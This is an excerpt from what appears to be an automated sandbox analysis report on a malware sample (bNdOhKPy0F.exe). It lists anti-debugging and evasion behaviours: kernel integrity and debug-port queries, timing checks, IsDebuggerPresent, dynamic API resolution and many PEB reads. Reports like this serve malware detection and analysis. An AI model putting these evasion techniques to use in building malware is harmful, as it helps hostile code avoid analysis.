Source: explorer.exe, 00000004.00000000.273313301.0000000008270000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.501163929.0000029B8A340000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.327282314.000001DA80E60000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.356495625.0000024496740000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.377708887.0000026E50140000.00000002.00000001.sdmp, 2531.exe, 00000019.00000002.511724942.00000000060D0000.00000002.00000001.sdmp, svchost.exe, 0000001B.00000002.416925963.0000019C23660000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd System information queried: CodeIntegrityInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\webgfvd Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E156B90 rdtsc 1_2_6E156B90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169600 ZwOpenKey,LdrInitializeThunk, 1_2_6E169600
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_004093F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004093F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_0040C590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0040C590
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_03290042 push dword ptr fs:[00000030h] 0_2_03290042
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B2E14 mov eax, dword ptr fs:[00000030h] 1_2_6E1B2E14
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12C600 mov eax, dword ptr fs:[00000030h] 1_2_6E12C600
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12C600 mov eax, dword ptr fs:[00000030h] 1_2_6E12C600
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12C600 mov eax, dword ptr fs:[00000030h] 1_2_6E12C600
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DFE3F mov eax, dword ptr fs:[00000030h] 1_2_6E1DFE3F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12A63B mov eax, dword ptr fs:[00000030h] 1_2_6E12A63B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12A63B mov eax, dword ptr fs:[00000030h] 1_2_6E12A63B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E160E21 mov eax, dword ptr fs:[00000030h] 1_2_6E160E21
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A5623 mov eax, dword ptr fs:[00000030h] 1_2_6E1A5623
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B6652 mov eax, dword ptr fs:[00000030h] 1_2_6E1B6652
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153E70 mov eax, dword ptr fs:[00000030h] 1_2_6E153E70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DE9E mov eax, dword ptr fs:[00000030h] 1_2_6E15DE9E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DE9E mov eax, dword ptr fs:[00000030h] 1_2_6E15DE9E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DE9E mov eax, dword ptr fs:[00000030h] 1_2_6E15DE9E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123E80 mov eax, dword ptr fs:[00000030h] 1_2_6E123E80
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123E80 mov eax, dword ptr fs:[00000030h] 1_2_6E123E80
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B2EA3 mov eax, dword ptr fs:[00000030h] 1_2_6E1B2EA3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A46A7 mov eax, dword ptr fs:[00000030h] 1_2_6E1A46A7
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8ED6 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8ED6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1536CC mov eax, dword ptr fs:[00000030h] 1_2_6E1536CC
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E163EE4 mov eax, dword ptr fs:[00000030h] 1_2_6E163EE4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E163EE4 mov eax, dword ptr fs:[00000030h] 1_2_6E163EE4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E163EE4 mov eax, dword ptr fs:[00000030h] 1_2_6E163EE4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1516E0 mov ecx, dword ptr fs:[00000030h] 1_2_6E1516E0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14F716 mov eax, dword ptr fs:[00000030h] 1_2_6E14F716
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154710 mov eax, dword ptr fs:[00000030h] 1_2_6E154710
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1BFF10 mov eax, dword ptr fs:[00000030h] 1_2_6E1BFF10
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1BFF10 mov eax, dword ptr fs:[00000030h] 1_2_6E1BFF10
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126730 mov eax, dword ptr fs:[00000030h] 1_2_6E126730
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126730 mov eax, dword ptr fs:[00000030h] 1_2_6E126730
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126730 mov eax, dword ptr fs:[00000030h] 1_2_6E126730
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15E730 mov eax, dword ptr fs:[00000030h] 1_2_6E15E730
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14B73D mov eax, dword ptr fs:[00000030h] 1_2_6E14B73D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14B73D mov eax, dword ptr fs:[00000030h] 1_2_6E14B73D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124F2E mov eax, dword ptr fs:[00000030h] 1_2_6E124F2E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124F2E mov eax, dword ptr fs:[00000030h] 1_2_6E124F2E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B5F5F mov eax, dword ptr fs:[00000030h] 1_2_6E1B5F5F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B5F5F mov eax, dword ptr fs:[00000030h] 1_2_6E1B5F5F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B5F5F mov eax, dword ptr fs:[00000030h] 1_2_6E1B5F5F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B5F5F mov eax, dword ptr fs:[00000030h] 1_2_6E1B5F5F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B5F5F mov eax, dword ptr fs:[00000030h] 1_2_6E1B5F5F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12A745 mov eax, dword ptr fs:[00000030h] 1_2_6E12A745
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DF4C mov eax, dword ptr fs:[00000030h] 1_2_6E15DF4C
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 mov eax, dword ptr fs:[00000030h] 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 mov eax, dword ptr fs:[00000030h] 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 mov eax, dword ptr fs:[00000030h] 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 mov eax, dword ptr fs:[00000030h] 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 mov eax, dword ptr fs:[00000030h] 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 mov eax, dword ptr fs:[00000030h] 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 mov eax, dword ptr fs:[00000030h] 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126F60 mov eax, dword ptr fs:[00000030h] 1_2_6E126F60
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126F60 mov eax, dword ptr fs:[00000030h] 1_2_6E126F60
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14E760 mov eax, dword ptr fs:[00000030h] 1_2_6E14E760
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14E760 mov eax, dword ptr fs:[00000030h] 1_2_6E14E760
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8F6A mov eax, dword ptr fs:[00000030h] 1_2_6E1F8F6A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov ecx, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 mov eax, dword ptr fs:[00000030h] 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123FC5 mov eax, dword ptr fs:[00000030h] 1_2_6E123FC5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123FC5 mov eax, dword ptr fs:[00000030h] 1_2_6E123FC5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123FC5 mov eax, dword ptr fs:[00000030h] 1_2_6E123FC5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1637F5 mov eax, dword ptr fs:[00000030h] 1_2_6E1637F5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB mov eax, dword ptr fs:[00000030h] 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB mov eax, dword ptr fs:[00000030h] 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB mov eax, dword ptr fs:[00000030h] 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB mov eax, dword ptr fs:[00000030h] 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB mov eax, dword ptr fs:[00000030h] 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB mov eax, dword ptr fs:[00000030h] 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB mov eax, dword ptr fs:[00000030h] 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8C14 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8C14
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F740D mov eax, dword ptr fs:[00000030h] 1_2_6E1F740D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F740D mov eax, dword ptr fs:[00000030h] 1_2_6E1F740D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F740D mov eax, dword ptr fs:[00000030h] 1_2_6E1F740D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC01 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC01
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC01 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC01
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC01 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC01
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC01 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC01
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1C06 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1C06
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124439 mov eax, dword ptr fs:[00000030h] 1_2_6E124439
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15BC2C mov eax, dword ptr fs:[00000030h] 1_2_6E15BC2C
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8450 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8450
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC77 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC77
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC77 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC77
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC77 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC77
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13FC77 mov eax, dword ptr fs:[00000030h] 1_2_6E13FC77
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E165C70 mov eax, dword ptr fs:[00000030h] 1_2_6E165C70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8C75 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8C75
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B mov eax, dword ptr fs:[00000030h] 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14746D mov eax, dword ptr fs:[00000030h] 1_2_6E14746D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 mov eax, dword ptr fs:[00000030h] 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12649B mov eax, dword ptr fs:[00000030h] 1_2_6E12649B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12649B mov eax, dword ptr fs:[00000030h] 1_2_6E12649B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E121480 mov eax, dword ptr fs:[00000030h] 1_2_6E121480
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124CB0 mov eax, dword ptr fs:[00000030h] 1_2_6E124CB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F9CB3 mov eax, dword ptr fs:[00000030h] 1_2_6E1F9CB3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122CDB mov eax, dword ptr fs:[00000030h] 1_2_6E122CDB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8CD6 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8CD6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E14FB mov eax, dword ptr fs:[00000030h] 1_2_6E1E14FB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E3518 mov eax, dword ptr fs:[00000030h] 1_2_6E1E3518
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E3518 mov eax, dword ptr fs:[00000030h] 1_2_6E1E3518
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E3518 mov eax, dword ptr fs:[00000030h] 1_2_6E1E3518
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F51D mov eax, dword ptr fs:[00000030h] 1_2_6E12F51D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12AD30 mov eax, dword ptr fs:[00000030h] 1_2_6E12AD30
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8D34 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8D34
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154D3B mov eax, dword ptr fs:[00000030h] 1_2_6E154D3B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154D3B mov eax, dword ptr fs:[00000030h] 1_2_6E154D3B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154D3B mov eax, dword ptr fs:[00000030h] 1_2_6E154D3B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151520 mov eax, dword ptr fs:[00000030h] 1_2_6E151520
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151520 mov eax, dword ptr fs:[00000030h] 1_2_6E151520
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151520 mov eax, dword ptr fs:[00000030h] 1_2_6E151520
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151520 mov eax, dword ptr fs:[00000030h] 1_2_6E151520
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151520 mov eax, dword ptr fs:[00000030h] 1_2_6E151520
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E147D50 mov eax, dword ptr fs:[00000030h] 1_2_6E147D50
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E163D43 mov eax, dword ptr fs:[00000030h] 1_2_6E163D43
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D8D47 mov eax, dword ptr fs:[00000030h] 1_2_6E1D8D47
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D3D40 mov eax, dword ptr fs:[00000030h] 1_2_6E1D3D40
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12354C mov eax, dword ptr fs:[00000030h] 1_2_6E12354C
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12354C mov eax, dword ptr fs:[00000030h] 1_2_6E12354C
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14C577 mov eax, dword ptr fs:[00000030h] 1_2_6E14C577
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14C577 mov eax, dword ptr fs:[00000030h] 1_2_6E14C577
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123591 mov eax, dword ptr fs:[00000030h] 1_2_6E123591
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EB581 mov eax, dword ptr fs:[00000030h] 1_2_6E1EB581
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EB581 mov eax, dword ptr fs:[00000030h] 1_2_6E1EB581
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EB581 mov eax, dword ptr fs:[00000030h] 1_2_6E1EB581
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EB581 mov eax, dword ptr fs:[00000030h] 1_2_6E1EB581
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151DB5 mov eax, dword ptr fs:[00000030h] 1_2_6E151DB5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151DB5 mov eax, dword ptr fs:[00000030h] 1_2_6E151DB5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151DB5 mov eax, dword ptr fs:[00000030h] 1_2_6E151DB5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1535A1 mov eax, dword ptr fs:[00000030h] 1_2_6E1535A1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DFDD3 mov eax, dword ptr fs:[00000030h] 1_2_6E1DFDD3
